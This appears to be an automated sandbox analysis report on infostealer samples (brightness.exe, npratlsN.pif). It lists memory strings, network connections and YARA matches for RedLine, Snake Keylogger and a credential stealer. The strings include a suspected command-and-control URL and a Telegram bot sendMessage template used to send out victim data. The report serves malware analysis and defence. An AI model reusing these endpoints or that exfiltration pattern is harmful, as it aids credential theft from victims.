Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: brightness.exe, 00000004.00000002.1860229176.0000000000656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/Z
Source: brightness.exe, 00000004.00000002.1883329411.00000000206DD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/admin/245_Nslta
Source: brightness.exe, 00000004.00000002.1860229176.0000000000656000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.00000000206AB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/admin/245_Nsltarpncon
Source: brightness.exe, 00000004.00000002.1860229176.000000000063D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/admin/245_Nsltarpncon6B
Source: brightness.exe, 00000004.00000002.1860229176.0000000000681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com:443/admin/245_Nsltarpncon
Source: npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B8B8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20a
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: npratlsN.pif, 0000000E.00000002.3457231521.000000002193C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C0A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B990000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enLz
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B98B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002183A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BEE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B853000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.00000000217D3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BEE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: npratlsN.pif, 00000010.00000002.3457162026.000000002BF55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002183A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF0F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B907000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C82C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022BA9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A69000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022961000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000227AC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022913000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022988000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D097000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CEBC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D178000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D2B9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D022000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: npratlsN.pif, 0000000A.00000003.2435365448.000000002CA7F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C807000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C87C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA35000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C832000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.000000002291B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022963000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A44000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022787000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000228EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D073000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D271000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D02A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CE97000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CFFF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D154000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B907000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C82C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022BA9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A69000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022961000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000227AC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022913000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022988000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D097000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CEBC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D178000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D2B9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D022000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: npratlsN.pif, 0000000A.00000003.2435365448.000000002CA7F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C807000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C87C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA35000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C832000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.000000002291B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022963000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A44000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022787000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000228EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D073000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D271000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D02A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CE97000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CFFF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D154000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: npratlsN.pif, 00000010.00000002.3457162026.000000002C0A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: npratlsN.pif, 00000010.00000002.3457162026.000000002C095000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/0
Source: npratlsN.pif, 00000010.00000002.3457162026.000000002C0A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/Dz
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B9C1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002196D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/Lz
Source: npratlsN.pif, 0000000E.00000002.3457231521.000000002195E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/h
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B9BC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021968000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C09F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52756
Source: unknown	Network traffic detected: HTTP traffic on port 52785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 52779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52792
Source: unknown	Network traffic detected: HTTP traffic on port 52775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52755
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52796
Source: unknown	Network traffic detected: HTTP traffic on port 52746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52762
Source: unknown	Network traffic detected: HTTP traffic on port 52792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52764
Source: unknown	Network traffic detected: HTTP traffic on port 52795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52779
Source: unknown	Network traffic detected: HTTP traffic on port 52783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52776
Source: unknown	Network traffic detected: HTTP traffic on port 52750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52775
Source: unknown	Network traffic detected: HTTP traffic on port 52796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52780
Source: unknown	Network traffic detected: HTTP traffic on port 52744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 52780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 52759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52748
Source: unknown	Network traffic detected: HTTP traffic on port 52782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52783
Source: unknown	Network traffic detected: HTTP traffic on port 52790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52744
Source: unknown	Network traffic detected: HTTP traffic on port 52755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52785
Source: unknown	Network traffic detected: HTTP traffic on port 52772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52790
Source: unknown	Network traffic detected: HTTP traffic on port 52766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52762 -> 443

Source: unknown	HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:52761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:52782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:52796 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.brightness.exe.219233d8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.Nsltarpn.PIF.20fe67a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
